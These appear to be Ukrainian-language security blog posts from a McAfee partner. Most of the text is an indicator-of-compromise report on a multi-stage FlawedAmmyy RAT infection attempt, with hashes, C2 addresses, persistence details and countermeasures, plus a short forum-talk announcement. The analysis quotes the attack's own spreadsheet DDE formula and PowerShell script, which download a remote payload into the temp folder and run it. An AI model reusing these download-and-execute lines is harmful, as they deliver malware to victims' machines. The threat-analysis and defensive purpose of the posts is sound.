"C:\Windows\system32\cmd.exe" /c del C:\tmp\cmd_.exe >> NUL

Закріплення через планувальник задач:

\Microsoft Window Center zivLFKKY SynapticosSoft, Corporation. c:\programdata\settings\wsus.exe 06.06.2018 21:27

Мережеві IOC:

Завантаження проміжного та основного тіла:

95.213.251.149   thespecsupportservice{.} com       POST /duo.dat Mozilla/4.0   (application/x-www-form-urlencoded)
95.213.251.149   thespecsupportservice{.} com       GET /uno.dat 
95.213.251.149   thespecsupportservice{.} com       GET /dr.png 
5.213.251.149    thespecsupportservice{.} com       GET /load.png 

Трафік інфікованої системи:

wsus.exe    2096 TCP   103.208.86.140   80     ESTABLISHED                                                                            
wsus.exe    2096 TCP   103.208.86.140   80     ESTABLISHED            

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування доставки запускних на рівні Web та Email шлюзів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\ – дозволить упередити копіювання файлів JRE
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_FlawedAmmyyRAT_250518

Доброго вечора, панове.

25/05/18 була зафіксована спроба інфікування #FlawedAmmyy (RAT).

# FlawedAmmyy застосовується для віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі не контролюють PowerShell та створення .exe, – високий.

А для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Доставка та закріплення проходять у 4 кроки (multi-stage attack)
  • Сервер, що розповсюджував усі 4 компоненти уже offline
  • Перші 2 кроки залучають PowerShell для завантаження та запуску проміжного downloader`а
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані в скрипті (not random)
  • Запускний файл downloader’а не кодований, а от основна частина – кодована (packed)
  • Прав Адміністратора не потребує
  • По при цікавий підхід, нічого нового. Не варто боятися. Дивіться блок “Контрзаходи”

І так, проблеми будуть у тих, хто:

  • Не заборонили передачу команд cmd > powershell (більше 50% організацій)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • Не заборонили мережевий трафік для powershell (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

#1 http://clodflarechk{.} com/2.dat (ps command-1)

#2 http://clodflarechk{.} com/1.dat (ps command-2)

#3 http://clodflarechk{.} com/data.xls (exe-1, downloader)

#4 http://clodflarechk{.} com/cloud.png (exe-2, RAT)

Маркери IOC:

1-й крок

SHA-256               05660c8d652fb9df8dab6a5705e3e2243b215ad5354000961feaebc07ed89ad9
File name            2.dat
File size 170 B

Зміст:

=cmd|’ /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX

((new-object net.webclient).downloadstring(\”http://clodflarechk{.} com/1.dat\“))’!A0

2-й крок

SHA-256               ebce76b8efff3a0568aa2b07d5fba8f21fe3dd6f56bfad0a77194a494b634079
File name            1.dat
File size 309 B

Зміст:

$urls = “http://clodflarechk{.} com/data.xls“,””

foreach($url in $urls){

Try

{

                Write-Host $url

                $fp = “$env:temp\cmd_.exe”    

                Write-Host $fp

                $wc = New-Object System.Net.WebClient

                $wc.DownloadFile($url, $fp)

                Start-Process $fp

3-й крок:

SHA-256               f4b6b0c8787ea344ce9f68f5d506a5d6cc7447114b3dcdbb6d0207372054dfe2
File name            data.xls (exe)
File size 123.5 KB

Проміжний downloader, завантажує останню частину – основний модуль

clodflarechk{.} com/cloud.png

4-й крок:

SHA-256               05f44c8d73f775e64442f75fde55b9b75f0c8c14005977c435359e92b5470b07
File name            cloud.png
File size 644 KB

Який після декодування стає

SHA-256               bab69fb29c167451608f0840ede9dfb4c3c52fa0da5f38089ac7f2afbd94d867
File name            wsus.exe
File size 644 KB

Відкриває з’єднання із С2

Усе.

Усю ланку нажаль наживо уже не відтворю, тому що сайт вимкнутий.

Мережеві IOC:

Трафік інфікованої системи:

data.exe    85.119.150.29 : 80      - завантаження основної частини
wsus.exe    103.208.86.69 : 443    - з’єднання із С2

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування доставки запусних на рівні Web та Email шлюзів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\ – дозволить упередити копіювання файлів JRE
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

McAfeeCybersecForum

31го травня  ми приймали участь у #McAfeeCybersecForum.

Раджу ознайомитися із слайдами. Суто технічний контент.

 

Моя доповідь стосувалася sandbox`у McAfee ATD та його інтеграції з Cisco, Fortinet та ін. рішеннями.

В презентації є слайди з демо TIE та DLX / OpenDXL іще кілька цікавинок (кейс про макрос та Нацполіцію)

Кому не зручно, можуть взяти pdf (~3 Mb)

 

Олег розповідав про практичне застосування McAfee NSP та Web Gateway.

Наводив багато цінних порад:

Кому не зручно, можуть взяти pdf (~6 Mb)

Будьте уважні та обережні.

Слідкуйте за нашою сторінкою у Facebook

https://www.facebook.com/Optidata.com.ua/

VR